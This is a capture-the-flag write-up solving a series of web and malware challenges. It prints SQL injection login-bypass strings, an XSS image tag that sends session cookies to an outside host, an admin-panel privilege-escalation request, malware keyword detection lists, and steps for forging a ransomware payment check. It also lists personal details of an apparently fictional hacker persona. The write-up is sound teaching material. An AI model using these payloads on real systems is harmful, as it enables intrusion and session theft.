SBT HILLTOP CTF

!!
IF YOU ARE A BEGINNER PLEASE DON'T GO STRAIGHT TO THE ANSWER/FLAG. Try to understand how everything works... because after all, what matters is the knowledge acquired.

!!

Beep Beep Boop [Warmup]

Hey, Hey you! Yes you! I visited this weird website and suddenly started hearing some beep boop beep sounds... Can you help me figure out what it could be?
This web challenge has multiple references to robots.
When you hear the word robots in the web field, we all know we're talking about Web Wanderers, Crawlers or Spiders. Read more about crawlers here!

These web crawlers are savages! We must control them and tell them where they can go and where they cannot go... This is why there is a common file called "robots.txt".
This file specifically says which paths are allowed and which are not. (let's be real here... none of them actually respect it haha)

Having this information, let's now check if there is a robots.txt file.
Whoa... what did we find here?
User-agent: *
Disallow: /NmZmOWQ1MzkwNDdmZGUxNTllODhkMmQxZTExZWY1NzQuaHRtbA==

That looks like Base64... let's decode it: 6ff9d539047fde159e88d2d1e11ef574.html

Hmmm... looks like a randomly named HTML page... let's try accessing it.
Beep* Beep* Boop* Beep* Beep* HillTopCTF{Mr_r0b0t_w4s_h3r3_1ak20isjkd}

We got it!

Drop The Anchor [Warmup2]

There isn't much to say about this one... it's pretty much analysing code and giving it the right input.

Quick steps to solve it:

The JS code takes 13 characters from the URL anchor (the part after #) and compares each one against a specific expected character.

1st Step - Reverse engineer the code so we get the right anchor
2nd Step - Add the anchor to the URL (#weareanchored)
3rd Step - md5 the anchor and append the hash to it (#weareanchored_c5c8a607a07dbd08ac8f58499ea1ed19)

tada! ;)


P2SEC 1 - Building

Looking closely at the buttons, some appear to be worn off...
It's a combination of 4 numbers and we know which ones they are... 1 4 6 8

If we inspect the html code, someone left a note on the wall mentioning that the code starts with the number 4.
So all we have to do now is "bruteforce" it.

The right code is 4 1 6 8

Tada!


P2SEC 2 - Login

This is a simple SQLi (SQL Injection) challenge.
The vulnerable field is Password, and any of the following payloads would let the user bypass the login (there are more):

- ' or '1'='1
- " or "1"="1
- "or"1"="1
- " OR "1"="1
- "OR"1"="1
tada! we are in!
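To make the bypass concrete, here is an added example (not the challenge's own source, which we don't have) using an in-memory SQLite database: the string-built query beside the parameterised one, run with the first payload above. The table, the "ross"/"hunter2" account and the plaintext password storage are constructed for the demo.

```python
import sqlite3


def make_db():
    # Constructed demo database: one account. Passwords are stored in
    # plaintext only to keep the demo short; a real app stores a salted hash.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('ross', 'hunter2')")
    return conn


def build_vulnerable_query(username, password):
    # The bug: user input is pasted straight into the SQL text. A quote in the
    # password field ends the string literal and the rest is parsed as SQL, so
    #   ' or '1'='1
    # turns the WHERE clause into  (username = ... AND password = '') OR '1'='1'
    return ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def vulnerable_login(username, password):
    conn = make_db()
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def safe_login(username, password):
    # Parameterised query: the driver sends the values separately from the SQL
    # text, so quotes inside the password are just characters to compare.
    conn = make_db()
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    payload = "' or '1'='1"  # first payload from the writeup
    print(build_vulnerable_query("nobody", payload))
    print("vulnerable:", vulnerable_login("nobody", payload))  # True, with no such account
    print("safe:      ", safe_login("nobody", payload))        # False
```

The double-quoted variants in the list work the same way against an application that wraps the password in double quotes instead of single ones.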



P2SEC 3 - Tickets

This challenge might be a little bit boring, but it's required for the story line to make sense.

Players are first presented with 4 tickets which are perfectly fine.
They must submit answers to all of them in order to progress.

The only requirement for a valid answer is a minimum of 50 characters.
(The content of the answer isn't being analysed, but it could be, to make it harder.)

Let's submit our comment with "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Once we've done that for the first 4 tickets, we will unlock 3 more.

Now... the 6th ticket, #6841711215, contains a small payload to steal the session cookies.
All we have to do is open the source code and copy the original, unrendered payload.

This is obviously an issue that must be reported... Let's head to the report page and fill in the form with:
- 6841711215
- Suspicious Code
- < img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://dumpbin.com/binarygirl1010?c'+document.cookie;>
- Comments are not required.

Tada!


P2SEC 4 - Escalating

Given the information on the hints, let's crawl for some pages!

I've used DIRB.

Multiple files will come up, but only adminpanel.php is the right one.
If we try to access it, we get a 400 Bad Request.

If we change the request method to POST, we start receiving a couple of PHP errors.
Those errors tell us which parameters are missing, so we can keep adding data to our payload until it's accepted.

Data Required:

- admin_name -> ross (found on the chall's brief)
- action -> set
- level -> 1
- target -> user's cookie

Your final payload should look something like this, with target set to the user's full session cookie value (a long encoded string, pasted in whole):
admin_name=ross&action=set&level=1&target=<user's cookie value>


Tada!



P2SEC 5 - PromoTest

There isn't much to this challenge... It's more educational than a challenge itself.

Analyse each report and mark them as positive.
This time, the user's input is being validated.

If you get your answer wrong, you will be demoted.

Here are the keywords being verified for each ticket (1 keyword found = pass):

#1 - disable|kill|stop|end|anti
#2 - steal|rob|hijack|credentials|username|password|login|money|cash|bank|credit|bitcoin
#3 - reverse|shell|php|remote|connection|code|execution

When all of them are correctly marked as positive, you will have access to 2 new pages. The flag is in Logs.

Tada!


P2SEC 6 - Authorities

The following data about the hacker must be submitted to be able to retrieve the flag.

- Real Name -> Amy Sophia from https://www.instagram.com/depressedegurl666/ (found plain text in one of the gifs)
- Nickname -> binarygirl1010 (on the ticket payload)
- Real Address -> 62 Matilda St Port Lincoln SA 50606, Australia (me.jpg exif-data)
- Email Address -> h3ll22231144666999@protonmail.com (found on a note after defeating the malware)
- BTC/Paypal Address -> 1Z2Q89voyjwrVkbb6RfHAiLgqCaMs15w4 (in the malware's instructions)
- Known IP Address -> 45.135.151.61 (from logs)

The IP linked to the hacker can be found in the logs by searching for the same date on which the hacker submitted the malicious ticket.

Tada!


P2SEC 6.1 - Tunnel

3 Part Flag.

The malware is considered defeated when the user pays the hacker.
Every 10 seconds an HTTP request is made to a certain IP to check whether the payment was made.

Intercepting that traffic can be done using, for example, Fiddler.

All the player has to do is:
1st - Intercept the response packet on its way back
2nd - Grab the hashed information
3rd - Crack the hash: it's MD5, which can't be decrypted, but the plaintext follows the format Windows username + _0 (for example: john_0), so it can be guessed
4th - Change the flag from 0 to 1
5th - Hash it again with MD5
6th - Swap the hashes in the packet

You have now manipulated the malware into thinking that you have paid the hacker!
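As an added example (not the challenge's malware code), this reproduces the weakness those steps rely on and the fix a defender would want: the payment state is md5("<user>_<flag>") with no secret, so anyone who knows the format can recover it and rewrite it, while an HMAC keyed with a server-held secret cannot be rewritten without that key. The user name "john", the candidate list and SERVER_KEY are constructed placeholders.

```python
import hashlib
import hmac


def payment_token(user, paid):
    # What the writeup describes: an unsalted MD5 over a predictable string.
    return hashlib.md5(f"{user}_{paid}".encode()).hexdigest()


def recover_state(token, candidate_users):
    # MD5 is not reversible, but the input space is tiny and known:
    # try every plausible "user_flag" until the digest matches (cracking, not decrypting).
    for user in candidate_users:
        for paid in (0, 1):
            if payment_token(user, paid) == token:
                return user, paid
    return None


# How the check should have been built: an HMAC over the same state with a key
# the client never sees. Changing the flag now requires the key, not just the format.
SERVER_KEY = b"constructed-demo-key"  # hypothetical server-side secret


def signed_token(user, paid, key=SERVER_KEY):
    return hmac.new(key, f"{user}_{paid}".encode(), hashlib.sha256).hexdigest()


def verify_signed(user, paid, tag, key=SERVER_KEY):
    # Constant-time comparison; a tag made with a guessed key or a flipped flag fails.
    return hmac.compare_digest(signed_token(user, paid, key), tag)


if __name__ == "__main__":
    observed = payment_token("john", 0)              # what the malware sends
    print("recovered:", recover_state(observed, ["alice", "john"]))  # ('john', 0)
    print("rewritten:", payment_token("john", 1))     # the swapped-in hash from step 5
    bad_tag = signed_token("john", 1, key=b"wrong-guess")
    print("forgery without key accepted:", verify_signed("john", 1, bad_tag))  # False
```

The real fix, of course, is for the server to decide whether a payment happened rather than trusting any value the client echoes back.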

Part 1 -> base64( HilltopCTF{S1mpl3_m4lwar3_ ) - Hidden in the Windows temp folder (666.txt)
Part 2 -> base64( 4n4lysis_0011 ) - Windows Registry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\666)
Part 3 -> base64( 0011ks0k2kso} ) - Follow the link in a note on the desktop after defeating the malware

It was just a simple but fun challenge :p



If you'd like a more detailed writeup on the challenges, feel free to dm me and I will be more than happy to supply you! ❤️